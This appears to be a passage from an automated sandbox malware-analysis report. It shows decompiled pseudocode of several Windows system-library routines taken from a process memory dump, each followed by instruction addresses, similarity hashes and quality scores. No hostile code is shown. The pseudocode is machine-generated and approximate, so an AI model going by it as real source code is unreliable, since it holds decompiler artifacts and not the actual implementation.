                        			E02C61074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                        				char _v8;
                        				void* _v11;
                        				unsigned int _v12;
                        				void* _v15;
                        				void* __esi;
                        				void* __ebp;
                        				char* _t16;
                        				signed int* _t35;
                        
                        				_t22 = __ebx;
                        				_t35 = __ecx;
                        				_v8 = __edx;
                        				_t13 =  !( *__ecx) + 1;
                        				_v12 =  !( *__ecx) + 1;
                        				if(_a4 != 0) {
                        					E02C6165E(__ebx, 0x2c88ae4, (__edx -  *0x2c88b04 >> 0x14) + (__edx -  *0x2c88b04 >> 0x14), __edi, __ecx, (__edx -  *0x2c88b04 >> 0x14) + (__edx -  *0x2c88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                        				}
                        				E02C5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                        				if(E02BB7D50() == 0) {
                        					_t16 = 0x7ffe0388;
                        				} else {
                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				if( *_t16 != 0) {
                        					_t16 = E02C4FE3F(_t22, _t35, _v8, _v12);
                        				}
                        				return _t16;
                        			}











                        0x02c61074
                        0x02c61080
                        0x02c61082
                        0x02c6108a
                        0x02c6108f
                        0x02c61093
                        0x02c610ab
                        0x02c610ab
                        0x02c610c3
                        0x02c610cf
                        0x02c610e1
                        0x02c610d1
                        0x02c610da
                        0x02c610da
                        0x02c610e9
                        0x02c610f5
                        0x02c610f5
                        0x02c610fe

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e193df61bb9684bff57b7c2355fa221d1abf40360632c4a097fdd5257cc0c70d
                        • Instruction ID: d5311c43db920b27f78d89e38d9fd36e67ba96a3aba721e9526db14845f16ac6
                        • Opcode Fuzzy Hash: e193df61bb9684bff57b7c2355fa221d1abf40360632c4a097fdd5257cc0c70d
                        • Instruction Fuzzy Hash: 5F0168725043419FC710EF29C944B2A77E6ABC0315F08CA19F88993790DEB0D540CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02C4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02BDFA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x266;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}
















                        0x02c4fec0
                        0x02c4fec0
                        0x02c4fecf
                        0x02c4fed9
                        0x02c4fede
                        0x02c4fee0
                        0x02c4feeb
                        0x02c4fef3
                        0x02c4fef6
                        0x02c4fef9
                        0x02c4ff04
                        0x02c4ff16
                        0x02c4ff06
                        0x02c4ff0f
                        0x02c4ff0f
                        0x02c4ff21
                        0x02c4ff22
                        0x02c4ff24
                        0x02c4ff29
                        0x02c4ff3e

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 364eac16c874dea0216ea7bce1738aba169c61e4909dd11833910fa2b535609e
                        • Instruction ID: 3673ea7ad2e561c462b34395c62dee8a51a7c0c3882dc1dfef48bb8fb436579b
                        • Opcode Fuzzy Hash: 364eac16c874dea0216ea7bce1738aba169c61e4909dd11833910fa2b535609e
                        • Instruction Fuzzy Hash: 10018471E00618ABDB14DFA9D845FAFB7B8EF45710F04416AF901AB290EA719E01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02C4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02BDFA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x267;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}
















                        0x02c4fe3f
                        0x02c4fe3f
                        0x02c4fe4e
                        0x02c4fe58
                        0x02c4fe5d
                        0x02c4fe5f
                        0x02c4fe6a
                        0x02c4fe72
                        0x02c4fe75
                        0x02c4fe78
                        0x02c4fe83
                        0x02c4fe95
                        0x02c4fe85
                        0x02c4fe8e
                        0x02c4fe8e
                        0x02c4fea0
                        0x02c4fea1
                        0x02c4fea3
                        0x02c4fea8
                        0x02c4febd

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f45a98ff4a977aed9cad72ec4b4dd616cb60ce5260aa68b304863ba7102adc3
                        • Instruction ID: 3ab6ceb646ba4a7e1d22e5814354201573c13145b85146c4d741866a5e6332fc
                        • Opcode Fuzzy Hash: 2f45a98ff4a977aed9cad72ec4b4dd616cb60ce5260aa68b304863ba7102adc3
                        • Instruction Fuzzy Hash: A401D471E00658ABCB14DFA9D801FAFBBB8EF40700F00406AF904AB280EE709A00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02C68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				short _v66;
                        				char _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t31 = _a8;
                        				_t30 = _a12;
                        				_v66 = 0x1c20;
                        				_v40 = __ecx;
                        				_v36 = __edx;
                        				_v32 = _a4;
                        				_v28 = _a8;
                        				_v24 = _a12;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v72);
                        				_push(0x14);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                        			}
















                        0x02c68a62
                        0x02c68a71
                        0x02c68a79
                        0x02c68a82
                        0x02c68a85
                        0x02c68a89
                        0x02c68a8c
                        0x02c68a8f
                        0x02c68a92
                        0x02c68a95
                        0x02c68a9f
                        0x02c68ab1
                        0x02c68aa1
                        0x02c68aaa
                        0x02c68aaa
                        0x02c68abc
                        0x02c68abd
                        0x02c68abf
                        0x02c68ac4
                        0x02c68ada

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10164be40a341678663bc3e062669fe6aac9cd5f41f7c3100eb1c71d975b2f0d
                        • Instruction ID: 49c89938dda935afcddf65c75b68d25486c7c315deedcc016c83fc9208072e81
                        • Opcode Fuzzy Hash: 10164be40a341678663bc3e062669fe6aac9cd5f41f7c3100eb1c71d975b2f0d
                        • Instruction Fuzzy Hash: 90012171A4021D9FCB04DFA9D9459EEB7B8EF48710F10415AF905E7341EA34A900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02C68ED6(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				short _v62;
                        				char _v68;
                        				signed char* _t29;
                        				intOrPtr _t35;
                        				intOrPtr _t41;
                        				intOrPtr _t42;
                        				signed int _t43;
                        
                        				_t40 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t43;
                        				_v28 = __ecx;
                        				_v62 = 0x1c2a;
                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                        				_v24 = __edx;
                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                        				if(E02BB7D50() == 0) {
                        					_t29 = 0x7ffe0386;
                        				} else {
                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v68);
                        				_push(0x1c);
                        				_push(0x20402);
                        				_push( *_t29 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                        			}


















                        0x02c68ed6
                        0x02c68ee5
                        0x02c68eed
                        0x02c68ef0
                        0x02c68efa
                        0x02c68f03
                        0x02c68f0c
                        0x02c68f15
                        0x02c68f24
                        0x02c68f27
                        0x02c68f31
                        0x02c68f43
                        0x02c68f33
                        0x02c68f3c
                        0x02c68f3c
                        0x02c68f4e
                        0x02c68f4f
                        0x02c68f51
                        0x02c68f56
                        0x02c68f69

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 74852310423707bc1490e7ba6900bf012ecf4f9d0cc21c9b70d8c27645f6a74e
                        • Instruction ID: b887ad4058f8d8ee08f64840e9a3396cf5ad76fcd7b6667dd5f55aae98dd8fa1
                        • Opcode Fuzzy Hash: 74852310423707bc1490e7ba6900bf012ecf4f9d0cc21c9b70d8c27645f6a74e
                        • Instruction Fuzzy Hash: BF112171E006199FDB04DFA9D445BAEF7F4FF08300F0442AAE519EB382E6349940CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9DB60(signed int __ecx) {
                        				intOrPtr* _t9;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr _t14;
                        
                        				_t9 = __ecx;
                        				_t14 = 0;
                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                        					_t13 = 0xc000000d;
                        				} else {
                        					_t14 = E02B9DB40();
                        					if(_t14 == 0) {
                        						_t13 = 0xc0000017;
                        					} else {
                        						_t13 = E02B9E7B0(__ecx, _t12, _t14, 0xfff);
                        						if(_t13 < 0) {
                        							L02B9E8B0(__ecx, _t14, 0xfff);
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                        							_t14 = 0;
                        						} else {
                        							_t13 = 0;
                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                        						}
                        					}
                        				}
                        				 *_t9 = _t14;
                        				return _t13;
                        			}







                        0x02b9db64
                        0x02b9db66
                        0x02b9db6b
                        0x02b9dbaa
                        0x02b9db71
                        0x02b9db76
                        0x02b9db7a
                        0x02b9dba3
                        0x02b9db7c
                        0x02b9db87
                        0x02b9db8b
                        0x02bf4fa1
                        0x02bf4fb3
                        0x02bf4fb8
                        0x02b9db91
                        0x02b9db96
                        0x02b9db98
                        0x02b9db98
                        0x02b9db8b
                        0x02b9db7a
                        0x02b9db9d
                        0x02b9dba2

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 0d7a2399cc370ff0e88ddc88fdc21d52ac7a6945196bde8724e445a3d0511d21
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: DAF068332415639BDB327B974890B67A6969FC1B64F1600B6F2059B644CE64880296D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                        				signed char* _t13;
                        				intOrPtr _t22;
                        				char _t23;
                        
                        				_t23 = __edx;
                        				_t22 = __ecx;
                        				if(E02BB7D50() != 0) {
                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                        				} else {
                        					_t13 = 0x7ffe0384;
                        				}
                        				if( *_t13 != 0) {
                        					_t13 =  *[fs:0x30];
                        					if((_t13[0x240] & 0x00000004) == 0) {
                        						goto L3;
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t13 = 0x7ffe0385;
                        					} else {
                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                        					}
                        					if(( *_t13 & 0x00000020) == 0) {
                        						goto L3;
                        					}
                        					return E02C17016(0x14a4, _t22, _t23, _a4, _a8, 0);
                        				} else {
                        					L3:
                        					return _t13;
                        				}
                        			}






                        0x02b9b1e8
                        0x02b9b1ea
                        0x02b9b1f3
                        0x02bf4a17
                        0x02b9b1f9
                        0x02b9b1f9
                        0x02b9b1f9
                        0x02b9b201
                        0x02bf4a21
                        0x02bf4a2e
                        0x00000000
                        0x00000000
                        0x02bf4a3b
                        0x02bf4a4d
                        0x02bf4a3d
                        0x02bf4a46
                        0x02bf4a46
                        0x02bf4a55
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b9b20a
                        0x02b9b20a
                        0x02b9b20a
                        0x02b9b20a

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 4d906e353c5b58e095192f153991924ae92f0eae13d810f877dd38928de16334
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 3B01A4322006809BDB22975DD804F6ABBA9EF82758F0944F1FB648B6B1DB79C840E715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C2FE87(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_v16 = __ecx;
                        				_v54 = 0x1722;
                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0382;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}
















                        0x02c2fe96
                        0x02c2fe9e
                        0x02c2fea1
                        0x02c2fead
                        0x02c2feb3
                        0x02c2feb9
                        0x02c2fec3
                        0x02c2fed5
                        0x02c2fec5
                        0x02c2fece
                        0x02c2fece
                        0x02c2fee0
                        0x02c2fee1
                        0x02c2fee3
                        0x02c2fee8
                        0x02c2fefb

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47a4437bb201454034ddce0e280aa502d28961319a2f2be810ca8f5d7fc7d138
                        • Instruction ID: 7350c967548544228d93190608c14303bdab05db627a4249ca14f35fd1506019
                        • Opcode Fuzzy Hash: 47a4437bb201454034ddce0e280aa502d28961319a2f2be810ca8f5d7fc7d138
                        • Instruction Fuzzy Hash: 8E016275A0025CAFCB14DFA8D541AAEB7F4EF04304F104599F519DB382EA35DA01CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02C5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t32;
                        				_v20 = _a4;
                        				_v12 = _a8;
                        				_v24 = __ecx;
                        				_v16 = __edx;
                        				_v50 = 0x1021;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0380;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}















                        0x02c5131b
                        0x02c5132a
                        0x02c51330
                        0x02c51336
                        0x02c5133e
                        0x02c51341
                        0x02c51344
                        0x02c5134f
                        0x02c51361
                        0x02c51351
                        0x02c5135a
                        0x02c5135a
                        0x02c5136c
                        0x02c5136d
                        0x02c5136f
                        0x02c51374
                        0x02c51387

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f9846ef7610b5cbbe2a30adfd3c703202ef69fe036e98b9599ca55a46d1af97
                        • Instruction ID: 9fc8c61c224201ec11d4c72babe8ef66dd85ce4c91be990d1718715d91f447c6
                        • Opcode Fuzzy Hash: 3f9846ef7610b5cbbe2a30adfd3c703202ef69fe036e98b9599ca55a46d1af97
                        • Instruction Fuzzy Hash: 6A013C71A01618AFCB04EFA9D545AAEB7F4FF48700F0080A9FC09EB381EA74DA40CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02C68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t32;
                        				_v16 = __ecx;
                        				_v50 = 0x1c2c;
                        				_v24 = _a4;
                        				_v20 = _a8;
                        				_v12 = __edx;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}















                        0x02c68f6a
                        0x02c68f79
                        0x02c68f81
                        0x02c68f84
                        0x02c68f8b
                        0x02c68f91
                        0x02c68f94
                        0x02c68f9e
                        0x02c68fb0
                        0x02c68fa0
                        0x02c68fa9
                        0x02c68fa9
                        0x02c68fbb
                        0x02c68fbc
                        0x02c68fbe
                        0x02c68fc3
                        0x02c68fd6

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15371da843ad342428b57cfae4686996569f96fe7028cbc8fcb32d8f08bc7c42
                        • Instruction ID: 5fd69d006cf3bcec1b1e1cfb7641ef4da3c028b00eee6e7d6495567463eb4eb6
                        • Opcode Fuzzy Hash: 15371da843ad342428b57cfae4686996569f96fe7028cbc8fcb32d8f08bc7c42
                        • Instruction Fuzzy Hash: 5A014F75A0020CAFCB04EFB8D545AAEB7F5EF48700F108599F905EB380EA74DA00DB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C51608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t15;
                        				intOrPtr _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_t26 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t29;
                        				_v12 = _a4;
                        				_v20 = __ecx;
                        				_v16 = __edx;
                        				_v46 = 0x1024;
                        				if(E02BB7D50() == 0) {
                        					_t15 = 0x7ffe0380;
                        				} else {
                        					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v52);
                        				_push(0xc);
                        				_push(0x20402);
                        				_push( *_t15 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                        			}














                        0x02c51608
                        0x02c51617
                        0x02c5161d
                        0x02c51625
                        0x02c51628
                        0x02c5162b
                        0x02c51636
                        0x02c51648
                        0x02c51638
                        0x02c51641
                        0x02c51641
                        0x02c51653
                        0x02c51654
                        0x02c51656
                        0x02c5165b
                        0x02c5166e

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 853f7ad502410b21075c4a48ad4afdb361d2571066e9f6ad080265b9e35d68dc
                        • Instruction ID: 9c8fa97ca0cfa70a346a696cbdc77ec9547cd407ca49983e63d0e701f9487aa0
                        • Opcode Fuzzy Hash: 853f7ad502410b21075c4a48ad4afdb361d2571066e9f6ad080265b9e35d68dc
                        • Instruction Fuzzy Hash: 3DF04971A04658AFCB04EFA9D845AAEB7F4EF48300F0440A9E915EB281EA74DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BBC577(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02BBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2b711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L10:
                        						E02C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags == 0) {
                        						goto L10;
                        					}
                        					goto L9;
                        				} else {
                        					return 1;
                        				}
                        			}









                        0x02bbc577
                        0x02bbc57d
                        0x02bbc581
                        0x02bbc5b5
                        0x02bbc5b9
                        0x02bbc5ce
                        0x02bbc5ce
                        0x02bbc5ca
                        0x00000000
                        0x02bbc5ca
                        0x02bbc5c4
                        0x02bbc5c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bbc5ad
                        0x00000000
                        0x02bbc5af

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8c392a42ef758bf918a576832e25e77af642fc9108fd5b7ec7ae99f11e60470
                        • Instruction ID: 00b785f58da4e48d2729c57b8cfecf1971849c2a09f2ea292b2fac4875e27008
                        • Opcode Fuzzy Hash: e8c392a42ef758bf918a576832e25e77af642fc9108fd5b7ec7ae99f11e60470
                        • Instruction Fuzzy Hash: 26F09AB29256909FD733CB288046BB67FE8DF05674F4484E7D51A87643C7E4D880C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BD927A(void* __ecx) {
                        				signed int _t11;
                        				void* _t14;
                        
                        				_t11 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                        				if(_t11 != 0) {
                        					E02BDFA60(_t11, 0, 0x98);
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                        					E02BD92C6(_t11, _t14);
                        				}
                        				return _t11;
                        			}





                        0x02bd9295
                        0x02bd9299
                        0x02bd929f
                        0x02bd92aa
                        0x02bd92ad
                        0x02bd92ae
                        0x02bd92af
                        0x02bd92b0
                        0x02bd92b4
                        0x02bd92bb
                        0x02bd92bb
                        0x02bd92c5

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
